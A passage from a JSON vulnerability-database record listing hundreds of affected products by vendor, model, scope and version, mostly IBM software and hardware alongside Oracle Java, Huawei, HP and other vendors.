"version": "8.4" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.1" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.2" }, { "model": "jdk(os 1.7.0 45", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "x)" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.08" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "packaging utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1" }, { "model": "rational developer for i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.1" }, { "model": "openjdk", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "quidway s9300 v200r007sph003", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "db2\u00ae connect? enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.075" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.7" }, { "model": "ara", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5.71" }, { "model": "packaging utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.6" }, { "model": "buildforge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.2" }, { "model": "emptoris contract management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.53" }, { "model": "flashcopy manager for unix and linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.0" }, { "model": "tivoli key lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "jrockit r28.0.0", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "rational doors web access", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.51" }, { "model": "operational decision manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "predictiveinsight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.5" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.0.5" }, { "model": "security privileged identity manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1.1" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "content collector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0.3" }, { "model": "hsr6800 (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "ds8800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "86.31.167.0" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3690x571480" }, { "model": "rational requirements composer ifix5", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.6" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.17" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.16" }, { "model": "java sdk sr16-fp9", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "abyp-10g-4lr-1-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "tivoli netcool/omnibus webgui", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "rational build forge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.23" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.4.0.5" }, { "model": "flex system chassis management module 2pet12f", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.4" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.02" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.2" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.7" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.0.1" }, { "model": "rational automation framework", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.2" }, { "model": "tivoli storage manager for virtual environments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.2.3" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.075" }, { "model": "infosphere optim configuration manager for db2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "control center ifix01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.0" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x375087220" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.3" }, { "model": "java sdk 6r1 sr8-fp2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "sparc enterprise m9000 xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1117" }, { "model": "cognos business viewpoint fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "predictiveinsight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.720" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "bluemix workflow", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "cloud manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.1" }, { "model": "rational doors web access", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.6.1" }, { "model": "db2\u00ae workgroup server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.8" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "packaging utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4" }, { "model": "data studio client", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.3" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "infosphere biginsights", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.23" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.5" }, { "model": "emptoris sourcing", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.4" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.2" }, { "model": "ds8870", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "87.41.17.0" }, { "model": "java sdk sr16", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "policy center v100r003c00spc305", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3" }, { "model": "power ps700", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.7" }, { "model": "infosphere discovery", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "system networking rackswitch g8264", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "rational synergy ifix01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1.3" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.5" }, { "model": "flex system chassis management module 2pet12g", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "tivoli access manager for e-business", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "oceanstor 18800f v100r001c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "messagesight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.2" }, { "model": "personal communications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.4" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.8" }, { "model": "rational developer for aix and linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "0" }, { "model": "sterling control center ifix02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4.10" }, { "model": "flex system chassis management module 2pet10a", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "flashcopy manager for oracle", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.0" }, { "model": "tivoli directory integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "tivoli storage manager operations center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "infosphere optim performance manager for db2 on linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.1" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "tivoli monitoring fp6", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.30" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.44" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.5" }, { "model": "algo one", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.9.1" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.3" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5" }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "flex system chassis management module 2peo12e", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "spss collaboration and deployment services", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.0.2" }, { "model": "jrockit r28.1.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "smc2.0 v100r002c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "smartcloud cost management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.3" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "content collector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0.0" }, { "model": "notes and domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.4" }, { "model": "java sdk sr7", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "power express f/c", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "52056340" }, { "model": "oceanstor s5600t v200r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "730.40" }, { "model": "packaging utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.7.2" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.038" }, { "model": "flashsystem 9840-ae2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "840" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.6" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3" }, { "model": "db2\u00ae connect? application server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.5" }, { "model": "abyp-10g-4sr-1-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.0" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.74" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "p6000 command view software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.3.4" }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5" }, { "model": "ediscovery identification and collection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1" }, { "model": "buildforge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.3" }, { "model": "jrockit r28.2.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.3.1" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.31" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.3" }, { "model": "java se embedded 8u33", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "db2\u00ae connect? unlimited edition for system i\u00ae", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.03" }, { "model": "toolscenter suite", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.51" }, { "model": "java sdk sr16-fp6", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.5" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1.0" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.411" }, { "model": "java sdk sr12", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "java sdk", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "netiq sentinel", "scope": "eq", "trust": 0.3, "vendor": "novell", "version": "7.4.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.4.0.5" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.213" }, { "model": "qradar siem mr2 patch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.18" }, { "model": "tape subsystems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "openpages grc platform", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.0.0" }, { "model": "system idataplex dx360 m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x73210" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "emptoris supplier lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.23" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.713" }, { "model": "powervc standard edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1.0" }, { "model": "rational developer for system z if3", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.15" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.1" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.11" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.1.0" }, { "model": "ara", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.4.7" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.42" }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.5.4" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" }, { "model": "enterprise linux server supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "sterling connect:direct browser", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3" }, { "model": "rational developer for i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.01" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.2" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.51" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1.2" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.60" }, { "model": "oceanstor s5800t v200r002c20", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "cognos planning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.28" }, { "model": "system networking rackswitch g8264-t", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.9.13.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.2.0.5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.1" }, { "model": "packaging utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.6.3" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.3.0.12" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.6" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.4.1" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "flashcopy manager for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.1.1" }, { "model": "operations manager for windows", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.16" }, { "model": "sterling connect:express for unix ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6.1146-108" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.0" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.071" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.9.3" }, { "model": "p6000 command view software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.3.5" }, { "model": "tivoli network manager ip edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.8" }, { "model": "websphere partner gateway advanced edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1.3" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.4" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.3" }, { "model": "netiq sentinel", "scope": "eq", "trust": 0.3, "vendor": "novell", "version": "7.3.2" }, { "model": "tivoli system automation for multiplatforms", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "oceanstor s5800t v200r002c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "e9000 chassis v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "ara", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.2" }, { "model": "flashcopy manager for db2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.0" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.1" }, { "model": "power", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7800" }, { "model": "si (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "51205)0" }, { "model": "flashcopy manager for db2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1.2" }, { "model": "tivoli storage manager for virtual environments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.0" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.12" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.2" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.7.1" }, { "model": "emptoris sourcing", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.1.0" }, { "model": "enterprise linux workstation supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "db2\u00ae advanced workgroup server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.4" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.13.2" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.3" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x325025830" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.9" }, { "model": "jdk update2", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "rational software architect ifix1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.5.5" }, { "model": "p6000 command view software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.3.2" }, { "model": "infosphere master data management standard/advanced edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.3" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.2" }, { "model": "cloud manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.3" }, { "model": "jrockit r28.3.6", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "system networking rackswitch g8124-e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.32" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.2.1" }, { "model": "operational decision manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "rational directory server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.2" }, { "model": "smartcloud orchestrator fp1 ifix5", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.3" }, { "model": "smartcloud entry fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.110" }, { "model": "rational build utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "emptoris contract management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5.0.2" }, { "model": "system m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365079470" }, { "model": "power express f/c", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "52056330" }, { "model": "layer gbesm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2/30" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.16" }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.5" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.32" }, { "model": "bladecenter js43 with feature code", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7778-23x8446)0" }, { "model": "f1000-a-ei (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "powervc express edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.11" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2" }, { "model": "transactionvision", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.0" }, { "model": "rational developer for aix and linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.01" }, { "model": "system storage ts2900 tape library", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0026" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.032" }, { "model": "powervc express edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.2" }, { "model": "websphere service registry and repository", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.6.0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "oceanstor v100r001c30", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "18800" }, { "model": "rational requirements composer ifix4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.6" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.0" }, { "model": "db2\u00ae connect? unlimited edition for system i\u00ae", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "flex system chassis management module 2pet12h", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.4" }, { "model": "(comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "125005)0" }, { "model": "oceanstor cse v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "tivoli netcool configuration manager", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.4.1.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x363071580" }, { "model": "sparc enterprise m5000 xcp", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "1121" }, { "model": "rational tau interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.6" }, { "model": "personal communications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.6" }, { "model": "api management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "jre update2", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "msr (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "30-1x5)0" }, { "model": "asset manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.30" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.4" }, { "model": "jre update15", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "java", "scope": "eq", "trust": 0.3, 